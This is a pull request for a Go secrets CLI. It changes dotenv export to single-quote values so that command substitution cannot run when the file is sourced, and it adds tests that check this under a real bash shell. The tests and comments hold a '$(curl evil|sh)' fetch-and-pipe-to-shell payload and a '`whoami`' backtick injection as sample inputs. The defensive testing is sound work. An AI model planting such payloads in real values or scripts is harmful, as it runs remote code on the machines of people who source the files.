### PR TITLE
fix(cli): neutralize command substitution in exported dotenv values

### DIFF
--- a/internal/cli/secret/export.go
+++ b/internal/cli/secret/export.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"io"
 	"os"
+	"regexp"
 	"strings"
 	"syscall"
 	"time"
@@ -222,6 +223,26 @@ func fetchSecretValues(ctx context.Context, rc *common.RemoteClient, list []stru
 // "FOO\nINJECTED=evil" inject an extra, attacker-controlled KEY=VALUE line into an
 // artifact downstream tooling (docker run --env-file, CI --env-file) treats as fully
 // trusted. Refuse the export instead of silently producing an unsafe file.
+// dotenvPlainSafe matches values that need no quoting at all in the emitted
+// dotenv file: alnum plus a small allowlist of punctuation that's common in
+// real secret values (paths, URLs, timestamps) and carries no shell meaning.
+// Mirrors integrations/github-action/entrypoint.sh's write_output_file, which
+// uses the identical allowlist for the identical reason.
+var dotenvPlainSafe = regexp.MustCompile(`^[A-Za-z0-9_.,:/@+-]*$`)
+
+// writeDotenv emits KEY=VALUE lines. This file's own docs (and every dotenv
+// consumer convention, e.g. `set -a && . .env && set +a`) treat sourcing the
+// output with a shell as a real, documented consumption path, not a
+// hypothetical misuse. Any value outside dotenvPlainSafe is wrapped in SINGLE
+// quotes — the only POSIX-shell quoting form that suppresses ALL expansion
+// (command substitution $()/backtick, parameter/arithmetic expansion,
+// globbing, tilde expansion) — with only the literal single-quote character
+// escaped via the standard close-escape-reopen idiom ('\”). A prior revision
+// double-quoted non-plain values, which does NOT suppress $()/backtick
+// command substitution: a secret value containing e.g. `$(curl evil|sh)`
+// survived into the file unneutralized and would execute if later sourced
+// (adversarial-review integrations-github-action.json#2, the sibling gap this
+// closes — see entrypoint.sh's write_output_file for the bash precedent).
 func writeDotenv(w io.Writer, secrets []exportedSecret) error {
 	for _, s := range secrets {
 		if strings.ContainsAny(s.Name, "\r\n") {
@@ -231,8 +252,8 @@ func writeDotenv(w io.Writer, secrets []exportedSecret) error {
 	fmt.Fprintf(w, "# Exported by Keyorix — %s\n", time.Now().Format("2006-01-02")) //nolint:errcheck
 	for _, s := range secrets {
 		val := s.Value
-		if strings.ContainsAny(val, " \t\n\"'=\\") {
-			val = `"` + strings.ReplaceAll(strings.ReplaceAll(val, `\`, `\\`), `"`, `\"`) + `"`
+		if !dotenvPlainSafe.MatchString(val) {
+			val = "'" + strings.ReplaceAll(val, `'`, `'\''`) + "'"
 		}
 		fmt.Fprintf(w, "%s=%s\n", s.Name, val) //nolint:errcheck
 	}

--- a/internal/cli/secret/export_test.go
+++ b/internal/cli/secret/export_test.go
@@ -3,9 +3,11 @@ package secret
 import (
 	"bytes"
 	"context"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"os"
+	"os/exec"
 	"path/filepath"
 	"runtime"
 	"strings"
@@ -98,7 +100,8 @@ func TestWriteDotenv_RejectsCarriageReturnInSecretName(t *testing.T) {
 }
 
 // The ordinary case — no newline in any name — must still produce the expected
-// KEY=VALUE lines, with the value quote-escaped exactly as before.
+// KEY=VALUE lines, with the value single-quote-escaped (not double-quoted — see
+// writeDotenv's doc comment for why).
 func TestWriteDotenv_NormalNamesUnaffected(t *testing.T) {
 	var buf bytes.Buffer
 	secrets := []exportedSecret{
@@ -107,8 +110,58 @@ func TestWriteDotenv_NormalNamesUnaffected(t *testing.T) {
 	}
 	require.NoError(t, writeDotenv(&buf, secrets))
 	out := buf.String()
-	assert.Contains(t, out, `DB_PASSWORD="hello world"`)
+	assert.Contains(t, out, `DB_PASSWORD='hello world'`)
 	assert.Contains(t, out, "API_KEY=plain")
+}
+
+// #G-followup: a value containing a command-substitution payload must be
+// single-quoted, which suppresses $()/backtick expansion entirely — unlike the
+// previous double-quoting, which did NOT suppress it, so a value like
+// `$(curl evil|sh)` survived unneutralized into the exported file and would
+// execute if a caller later sourced it as documented (e.g. `set -a && . .env
+// && set +a`). Mirrors integrations/github-action/entrypoint.sh's
+// write_output_file, which was fixed for the identical gap
+// (adversarial-review integrations-github-action.json#2).
+func TestWriteDotenv_NeutralizesCommandSubstitution(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{
+		{ID: 1, Name: "PAYLOAD", Value: "$(curl evil|sh)"},
+		{ID: 2, Name: "BACKTICK", Value: "`whoami`"},
+	}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	out := buf.String()
+	assert.Contains(t, out, `PAYLOAD='$(curl evil|sh)'`)
+	assert.Contains(t, out, "BACKTICK='`whoami`'")
+
+	// Prove the neutralization actually holds under a real shell: source the
+	// file and confirm PAYLOAD/BACKTICK end up as the literal strings, not
+	// executed — the exact scenario this fix closes.
+	dir := t.TempDir()
+	envFile := filepath.Join(dir, "test.env")
+	require.NoError(t, os.WriteFile(envFile, buf.Bytes(), 0o600))
+	script := fmt.Sprintf("set -a; . %q; set +a; printf '%%s\\n%%s\\n' \"$PAYLOAD\" \"$BACKTICK\"", envFile)
+	cmdOut, err := exec.Command("bash", "-c", script).CombinedOutput() // #nosec G204 -- test-controlled fixed script string
+	require.NoError(t, err)
+	assert.Equal(t, "$(curl evil|sh)\n`whoami`\n", string(cmdOut),
+		"sourcing the exported file must yield the literal payload strings, not execute them")
+}
+
+// A value made entirely of the plain-safe allowlist charset is left unquoted,
+// matching write_output_file's identical optimization.
+func TestWriteDotenv_PlainSafeValueUnquoted(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{{ID: 1, Name: "URL", Value: "https://example.com/a/b_c.d-e:f@g+1,2"}}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	assert.Contains(t, buf.String(), "URL=https://example.com/a/b_c.d-e:f@g+1,2\n")
+}
+
+// A value containing a literal single quote must have it escaped via the
+// close-escape-reopen idiom, not left to terminate the quoted string early.
+func TestWriteDotenv_EscapesEmbeddedSingleQuote(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{{ID: 1, Name: "K", Value: "it's a secret"}}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	assert.Contains(t, buf.String(), `K='it'\''s a secret'`)
 }
 
 // TestWriteSecrets_JSONFormat verifies that writeSecrets dispatches to JSON correctly.

--- a/internal/cli/secret/secret_s8_test.go
+++ b/internal/cli/secret/secret_s8_test.go
@@ -1820,7 +1820,9 @@ func TestWriteDotenv_QuotedValue_S8(t *testing.T) {
 	var buf bytes.Buffer
 	err := writeDotenv(&buf, secrets)
 	require.NoError(t, err)
-	assert.Contains(t, buf.String(), `"val with spaces"`)
+	// Single-quoted, not double-quoted — see writeDotenv's doc comment: double
+	// quotes don't suppress $()/backtick command substitution.
+	assert.Contains(t, buf.String(), `'val with spaces'`)
 }
 
 // ─── runImport: remote path with doImport (skip-existing) ────────────────────


### PR DESCRIPTION
## Summary
- `writeDotenv`'s double-quoting of values with special characters did not
  suppress `$()`/backtick command substitution when the exported `.env` file
  was later sourced by a shell — the same gap already closed in
  `entrypoint.sh`'s `write_output_file` for the GitHub Action.
- Mirrors that fix's single-quote-with-`\'`-escape approach exactly, gated by
  a plain-safe-character allowlist so ordinary values stay unquoted.

## Test plan
- [x] `TestWriteDotenv_NeutralizesCommandSubstitution` actually shells out
      (`bash -c`) to source the exported file and asserts a `$(curl evil|sh)`
      payload comes back as a literal string, not executed.
- [x] `TestWriteDotenv_PlainSafeValueUnquoted`,
      `TestWriteDotenv_EscapesEmbeddedSingleQuote` added.
- [x] `go build`/`go vet`/`gofmt` clean
- [x] `gosec -severity medium` clean
